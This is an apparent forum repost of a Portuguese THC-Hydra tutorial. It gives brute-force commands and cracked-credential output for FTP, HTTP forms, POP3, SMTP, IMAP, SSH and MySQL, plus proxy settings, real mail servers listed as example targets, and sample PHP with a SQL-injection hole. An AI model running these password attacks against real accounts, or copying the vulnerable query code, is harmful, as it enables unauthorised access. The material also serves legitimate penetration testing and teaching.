Exploit [Portuguese] Tutorial Thc-Hydra ver 2.1

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18939
Проверка EDB
  1. Пройдено
Автор
MDH3LL
Тип уязвимости
PAPERS
Платформа
LINUX
CVE
N/A
Дата публикации
2012-05-28
Код:
 _   _               _               _           
| |_| |__   ___     | |__  _   _  __| |_ __ __ _ 
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
 \__|_| |_|\___|    |_| |_|\__, |\__,_|_|  \__,_|
                           |___/    TUTORIAL BÁSICO THC-HYDRA [PT-BR] ver 2.1 (Rev)

________________________________________________________________________________

Dom 27 Mai 2012 19:45:17 BRT - Por : MDH3LL
- Contato         : [email protected]
- Data            : Dom 21 Maio 2012
- Tutorial Ver    : 2.1
________________________________________________________________________________

********************************************************************************
Leia com Atenção!

Não me responsabilizo pelo uso que você leitor ou qualquer outra pessoa venha
a fazer com o conhecimento adquirido nesse tutorial.

O tutorial foi escrito exclusivamente com o intuito de ajudar pessoas
que não dominam idiomas estrangeiros e tem dificuldade de entender
sobre o funcionamento do THC-Hydra.

Preserve os créditos.
********************************************************************************

INDICE :
________________________________________________________________________________

[0x00] - Sobre THC-Hydra.
[0x01] - Compilando THC-HYDRA no Linux.
 + Bibliotecas suplementares.
 + Conhecendo o PW-Inspector sem muitos detalhes.
 + Tratando wordlist sem usar o PW-Inspector.
 + Executando Hydra.
[0x02] - Opções Hydra.
[0x03] - Exemplos Hydra.
 + Exemplo FTP
 + Exemplo http-head
 + Exemplo http-post-form
 + Exemplo http-get-form
 + Exemplo POP3
 + Exemplo SMTP
 + Exemplo IMAP
 + Exemplo SSH
 + Exemplo MYSQL
[0x04] - Proxy.
________________________________________________________________________________

################################################################################
[0x00] Sobre THC-Hydra
################################################################################


* THC-Hydra: Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://www.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente 
tentando combinações de senhas e nomes de usuários até chegar 
ao seu objetivo obvio.

Serviços suportados (v 7.1) :

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC and XMPP.


################################################################################
[0x01] Compilando THC-HYDRA no Linux :
################################################################################

baixar source, descompacta , entra no diretório criado :
--------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
--------------------------------------------------------------------------------

Configurações opcionais :
 --disable-xhydra não compila o xhydra (hydra GUI)
 --prefix=/opt/hydra diz onde vai ser instalado o hydra.

--------------------------------------------------------------------------------
$ ./configure --disable-xhydra --prefix=/opt/hydra
--------------------------------------------------------------------------------

compila, instala e cria link simbólico :
--------------------------------------------------------------------------------
# make && make install && ln -s /opt/hydra/hydra /usr/bin
--------------------------------------------------------------------------------

Caso queira usar o pw-inspector criar um link simbólico pra ele também :
--------------------------------------------------------------------------------
# ln -s /opt/hydra/pw-inspector /usr/bin
--------------------------------------------------------------------------------


================================================================================
Bibliotecas suplementares THC-HYDRA no Linux :                             
================================================================================

Para usar módulos como (ssh / mysql) é preciso instalar bibliotecas suplementares.

Para o modulo mysql é possível instalar direto dos repositórios de qualquer 
Debian-like.
--------------------------------------------------------------------------------
# apt-get install libmysqlclient-dev
--------------------------------------------------------------------------------

Para o modulo ssh segue os passos que usei no debian 6.
--------------------------------------------------------------------------------
# apt-get install cmake openssl zlib build-essential
$ wget http://www.libssh.org/files/0.4/libssh-0.4.0.tar.gz
$ tar -vzxf libssh-0.4.0.tar.gz && cd libssh-0.4.0
$ mkdir build && cd build
$ cmake -DWITH_SSH1=ON -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=/usr ..
# make && make install
--------------------------------------------------------------------------------

Depois basta compilar o hydra novamente :
--------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
$ ./configure --disable-xhydra --prefix=/opt/hydra
# make && make install 
--------------------------------------------------------------------------------


================================================================================
PW-Inspector :                             
================================================================================

PW-Inspector é um utilitário que vem ao pacote Hydra e serve exclusivamente pra 
tratar wordlists conforme os paramentos passados.

opções do 'pw-inspector' :

********************************************************************************
Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not withint the sets above
********************************************************************************

Segue as opções :

  -i FILE nome da wordlist pra ser tratada (default: stdin).
  -o FILE nome para o arquivo saída com o conteúdo já tratado (default: stdout).
  -m Tamanho minimo da senha.
  -M Tamanho máximo da senha.
  -c MINISETS número minimo de sets necessários.

   Sets:
     -l Caracteres minúsculos (a,b,c,d, etc.)
     -u Caracteres maiúsculos (A,B,C,D, etc.)
     -n Números  (1,2,3,4, etc.)
     -p Aqui são os caracteres que não se encaixam -l/-u/-n em são eles $,!,/,(,*, etc.)
     -s Caracteres especiais - são todos que não encaixam em nenhum dos sets acima.


Exemplos :

Criar wordlist suja para o teste :
--------------------------------------------------------------------------------
$ perl -le 'print map { ("a".."z", "A".."Z", 0..9)[rand 62] } 1..rand 10 for 1..100000' >> wordlist_suja.txt
--------------------------------------------------------------------------------

Usando o pw-inspector pra filtrar a wordlist "suja" e redirecionar para um novo arquivo apenas
as senhas que possuam o comprimento >= 6 && comprimento <= 8.
--------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -o wordlist_limpa.txt -m 6 -M 8
--------------------------------------------------------------------------------

Redirecionando saída padrão (stdout) para o sor ordenar.
--------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -m 6 -M 8 | sort >> wordlist_limpa_sort.txt
--------------------------------------------------------------------------------

Redirecionando conteúdo ordenado para a entrada padrão (stdin) :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 6 -M 8 >> wordlist_limpa_sort.txt
--------------------------------------------------------------------------------

Para o próximo caso não sera possível pegar nada se a wordlist_suja.txt foi criada
o script disponibilizado neste tutorial porque obriguei o pw-inspector a pegar 
apenas as senhas que contenham os 2 sets 
(números e caracteres especiais que definitivamente não existe na wordlist).
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 4 -M 4 -c 2 -n -s
--------------------------------------------------------------------------------

Se o número minimo fosse setado pra 1 pegaria as senhas que contenham o "set" -n (números).

================================================================================
Tratando wordlist sem usar o PW-Inspector.
================================================================================

Particularmente prefiro tratar as wordlists sem usar o pw-inspector que não
atende as minhas necessidades.

Os exemplos abaixo usam comandos simples que qualquer usuário Linux deveria conhecer.

Juntando wordlists :
--------------------------------------------------------------------------------
cat wordlist_1.txt wordlist_2.txt wordlist_3.txt >> wordlist_final.txt
--------------------------------------------------------------------------------

Ordenando e removendo senhas duplicadas :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | uniq -u
--------------------------------------------------------------------------------

Pegando senhas com o comprimento 2 a 4 contento apenas números :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[0-9]{6,8}$"
--------------------------------------------------------------------------------

Pegando senhas [a-z0-9] com apenas 6 caracteres :
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[a-z0-9]{6}$"
--------------------------------------------------------------------------------

Pegando senhas [a-zA-Z] com qualquer comprimento,removendo senhas duplicadas e
jogando o conteúdo para um novo arquivo chamado "wordlist_mdh3ll.txt"
--------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[a-zA-Z]*$" | uniq -u >> wordlist_mdh3ll.txt
ou
$ sort wordlist_suja.txt | grep -Pi "^[a-z]*$" | uniq -u >> wordlist_mdh3ll.txt
--------------------------------------------------------------------------------

Pegando senhas que comece com "1" e termine com "w".
--------------------------------------------------------------------------------
$ cat wordlist_suja.txt | grep -P "^1.*w$"
--------------------------------------------------------------------------------

Convertendo caracteres maiúsculos para minúsculos.
--------------------------------------------------------------------------------
$ cat wordlist_suja.txt | tr '[:upper:]' '[:lower:]' >> wordlist_minusculo.txt
ou
$ perl -ne 'print lc $_' wordlist_suja.txt
--------------------------------------------------------------------------------

================================================================================
Executando Hydra :
================================================================================

Rode 'hydra' no terminal:

********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE]
 [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] 
[-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -u        loop around users, not passwords (implied when using -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V   verbose mode / show login+pass combination for each attempt
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: cisco cisco-enable cvs ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 teamspeak telnet vmauthd vnc xmpp
  OPT       some service modules need special input (use -U to see module help)

... ...
********************************************************************************
Podemos ver acima que quando executado exibe informações como sintaxe,opções etc.



################################################################################
[0x02] Opções hydra :
################################################################################

 -R Restaura sessões abordadas/quebradas.
 -S Realiza conexão segura usando SSL caso seja necessário.
 -s Especifica o número da porta usada para estabelecer a conexão.
 -l Especifica "login" da vitima.
 -L Carrega uma lista contendo "logins" de vitimas (1 por linha).
 -p Especifica senha.
 -P Especifica o arquivo contendo as "passwords" (1 por linha).

 -x MIN:MAX:CHARSET Gerador de senhas
  Opções de geração :

   * MIN - número minimo de caracteres gerados.
   * MAX - número máximo de caracteres gerados.
   * CHARSET - especifica os sets de caracteres.

   a - letras minusculas.
   A - letras maiúsculas.
   1 - números.
   para qualquer outro use o caractere pertencente.

  Exemplos :
   -x 3:5:a     Gera senha com o comprimento [3-5] contendo caracteres [a-z].
   -x 5:8:A     Gera senha com o comprimento [5-8] contendo caracteres [A-Z].
   -x 5:8:A1    Gera senha com o comprimento [5-8] com caracteres [A-Z0-9]
   -x 1:3:/     Gera senha com o comprimento [1-3] contendo apenas / barra.
   -x 1:3:/%,.- Gera senha com o comprimento [1-3] contendo / % , . -

 -e nsr 'n' testa senha em branco    / 
		's' testa user como password / 
		'r' testa senha invertida

 -u    Não sei como funciona.
 -C    Usado pra carregar um arquivo contendo usuário:senha (equivale a -L/-P).
 -M    Carrega lista de servidores pra ataque paralelo (1 por linha).
 -o    Salva as senhas encontradas no arquivo especificado.
 -f    Faz o programa parar de trabalhar quando a senha ou usuário for encontrado.
 -t    Limita o número de conexões paralelas (default: 16).
 -w/-W Define Tempo máximo pra esperar respostar do servidor (default: 30s).
 -4/-6 preferir endereços IPv4 (default) ou endereços IPv6.
 -v/-V Modo [-v]erbose normal / [-V]erbose detalhado.
 -U    Detalha do modulo especificado.

Server: Servidor alvo. 
Exemplos: 
 127.0.0.1
 localhost
 pop.gmail.com
 pop.mail.yahoo.com.br 
 pop3.live.com 

Service: serviço/modulo/protocolo.
Exemplos:
 pop3
 ftp
 smtp
 vnc 
 imap
 http-head
 http-post-form
 http-get-form


################################################################################
[0x03] Exemplos:
################################################################################

Pratica das opções [0x02] deste tutorial. 

================================================================================
Exemplo FTP
================================================================================

Sintaxe:
--------------------------------------------------------------------------------
hydra -l root -P pass.txt -w 15 localhost ftp
--------------------------------------------------------------------------------

 __________________________________________________________
|________________________Terminal____________________|-|_|X|
||                                                        ||
|| mdh3ll@debian:~$ ftp                                   ||
|| ftp> o                                                 ||
|| (to) localhost                                         ||
|| Connected to localhost.                                ||
|| 220 ProFTPD 1.3.3d Server (ProFTPD) [::ffff:127.0.0.1] ||
|| Name (localhost:mdh3ll):                               ||
||                                                        ||
||________________________________________________________||
|__________________________________________________________|


Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:25:52
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: nobody   password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:25:53
********************************************************************************

Encontrou :
[21][ftp] host: 127.0.0.1   login: nobody   password: culture123


================================================================================
Exemplo http-head
================================================================================

Sintaxe:
--------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o out.txt localhost http-head /colt/
--------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
||_http://localhost/colt/________________________________ ||
||                                                        ||
||                                                        ||
||        __________________________________________      ||
||       |__Autenticação solicitada_______________|X|     ||
||       |O servidor localhost:80 requer um nome de |     ||
||       |usuário e senha.O servidor diz:colt user  |     ||
||       |                    ____________________  |     ||
||       |  nome de usuário: |_______mdh3ll_______| |     ||
||       |            Senha: |___**************___| |     ||
||       |                    __________   _______  |     ||
||       |___________________|_cancelar_|_|_login_|_|     ||
||                                                        ||
||                                                        ||
||                                                        ||
||                                                        ||
||________________________________________________________||
|_Concluído________________________________________________|

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:19:16
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: lampp   password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:19:16
********************************************************************************

O Hydra encontrou o e salvou no arquivo out.txt :
--------------------------------------------------------------------------------
usuario:lampp senha:culture123 
--------------------------------------------------------------------------------


================================================================================
Exemplo http-post-form
================================================================================

Sintaxe : <url>:<form parameters>:<condition string>[:<optional>[:<optional>]


código fonte do index.html ilustrativo :


http://127.0.0.1/login/index.html
--------------------------------------------------------------------------------
<html> 
<head><title>Login</title></head> 
<body>
<form method="POST" action="logar.php"> 
        <p> Nome </p></BR>
        <input type="text" name="user"></br> 
        <p> Senha </p></BR>
        <input type="password" name="pass"></br> 
        <input type="submit" name="enviar" value="Enviar"> 
</form> 
</body> 
</html> 
--------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox__________Login____________________|-|_|X|
||_http://127.0.0.1/login/index.html______________________ |
||                                                        ||
||          Nome                                          ||
||           _____________________________________        ||
||          |                                     |       ||
||          |_____________________________________|       ||
||                                                        ||
||          Senha                                         ||
||           _____________________________________        ||
||          |                                     |       ||
||          |_____________________________________|       ||
||                                                        ||
||                     ________________                   ||
||                    |     Enviar     |                  ||
||                    |________________|                  ||
||                                                        ||
||________________________________________________________||
|_Concluído________________________________________________|

logar.php ilustrativo :
--------------------------------------------------------------------------------
<?
        # logar.php ilustrativo
        $user = $_POST['user'];
        $pass = $_POST['pass'];

        if($user == "admin" && $pass == "culture123"){
                echo "Logado com sucesso!";
        }else{
                echo "Usuario ou senha invalida!";
        }
?>
--------------------------------------------------------------------------------

Sintaxe simples fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"
--------------------------------------------------------------------------------

Para criar esta sintaxe foi preciso :

Valor do atributo action do <form> : logar.php
Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass
Mensagem de erro ou parte dela: "Usuário ou senha invalida"

- O uso do caractere coringa é permitido : .*senha invalida
- É possível usar uma mensagem de sucesso adicionando S= antes da mensagem : 

--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"
--------------------------------------------------------------------------------


Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:51:14
[DATA] 1 task, 1 server, 47 login tries (l:1/p:47), ~47 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: culture123
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:51:14
********************************************************************************

Para obter mais detalhes execute : ./hydra -U http-post-form


================================================================================
Exemplo http-get-form
================================================================================

http-get-form vai seguir o mesmo modelo do http-post-form

--------------------------------------------------------------------------------
# index.html ilustrativo (http://127.0.0.1/index.html)

<html> 
<head><title>Login</title></head> 
<body>
<form method="GET" action="enviar.php"> 
        <p> Nome </p></BR>
        <input type="text" name="tx_nome"></br> 
        <p> Senha </p></BR>
        <input type="password" name="tx_senha"></br> 
        <input type="submit" name="go" value="Go"> 
</form> 
</body> 
</html> 
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
# enviar.php ilustrativo (http://127.0.0.1/enviar.php)

<?php
        # eviar.php ilustrativo
        require_once('conectar.php'); 

        $user = $_GET['tx_nome'];
        $pass = $_GET['tx_senha'];

        $pass = md5($pass);
        $pesquisa = MYSQL_QUERY("select usuario,senha from TBLogin where usuario = \"$user\" AND senha = \"$pass\"");
        $resultado = mysql_num_rows($pesquisa);
        if($resultado == 1){
                echo "Logado com sucesso";
        }else{
                echo "Algo esta errado";
        }
?>
--------------------------------------------------------------------------------

Sintaxe completa fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-get-form "enviar.php:user=^USER^&pass=^PASS^:Algo esta errado"
-----------------------------------------------------------------------------------

A Única mudança significativa é a troca do modulo "http-post-form" por "http-get-form"
na sintaxe.

Para obter mais detalhes execute : ./hydra -U http-get-form

================================================================================
Exemplo POP3
================================================================================
Sintaxe:
--------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.dominio.com pop3
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.dominio.com   login: [email protected] password: 123456
********************************************************************************


================================================================================
Exemplo SMTP
================================================================================
Sintaxe :
--------------------------------------------------------------------------------
hydra -l [email protected] -P pass.txt smtp.mail.dominio.com smtp
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 15:06:54
[DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: xxx.xxx.xxx.xxx   login: [email protected]   password: cabal12ea13
********************************************************************************


================================================================================
Exemplo IMAP
================================================================================
Sintaxe :
--------------------------------------------------------------------------------
hydra -l [email protected] -P pass.txt -S imap.dominio.com imap
--------------------------------------------------------------------------------

Saída:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 20:46:33
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service imap on port 993
[993][imap] host: xx.xxx.xx.xxx   login: [email protected]   password: love1234
[STATUS] attack finished for imap.dominio.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-11 20:46:37
********************************************************************************


================================================================================
Exemplo SSH
================================================================================

 __________________________________________________________
|________________________Terminal____________________|-|_|X|
||                                                        ||
||mdh3ll@debian:~$ ssh [email protected]                  ||
||The authenticity of host '192.168.1.4 (192.168.1.4)'\   ||
|| can't be established.                                  ||
||RSA key fingerprint is xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx ||
||Are you sure you want to continue\                      ||
|| connecting (yes/no)? yes                               ||
||Warning: Permanently added '192.168.1.4' (RSA)\         ||
|| to the list of known hosts.                            ||
||[email protected]'s password:                           ||
||________________________________________________________||
|__________________________________________________________|

Sintaxe :
--------------------------------------------------------------------------------
hydra -l teste -x 6:6:1 -s 22 192.168.1.4 ssh
--------------------------------------------------------------------------------

Saída :
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 16:44:47
[DATA] 16 tasks, 1 server, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.4   login: teste   password: 000138
[STATUS] attack finished for 192.168.1.4 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 16:45:26
********************************************************************************


================================================================================
Exemplo MYSQL
================================================================================

Sintaxe :
--------------------------------------------------------------------------------
hydra -l root -P pass.txt -t 4 127.0.0.1 mysql
--------------------------------------------------------------------------------

********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-14 19:09:23
[DATA] 4 tasks, 1 servers, 32 login tries (l:1/p:32), ~8 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 127.0.0.1   login: root   password: Password01
[STATUS] attack finished for 127.0.0.1 (waiting for childs to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-14 19:09:32
********************************************************************************


################################################################################
[0x04] Proxy:
################################################################################

Proxy web:

O uso de proxy no hydra se limita em definir uma nova variável de ambiente
com nome relacionado ao conteúdo.

Proxy HTTP :
--------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
--------------------------------------------------------------------------------

Para qualquer outro use : HYDRA_PROXY_CONNECT
--------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
--------------------------------------------------------------------------------

Com autentificação :
--------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
--------------------------------------------------------------------------------

pra saber se o proxy foi definido use echo $VARIAVEL_DEFINIDA no terminal :

--------------------------------------------------------------------------------
$ echo HYDRA_PROXY_HTTP
$ echo HYDRA_PROXY_CONNECT
$ echo HYDRA_PROXY_AUTH
--------------------------------------------------------------------------------

a saída deve retornar o conteúdo que você definiu na variável.

(Preserve os créditos do autor)
 
Источник
www.exploit-db.com

Похожие темы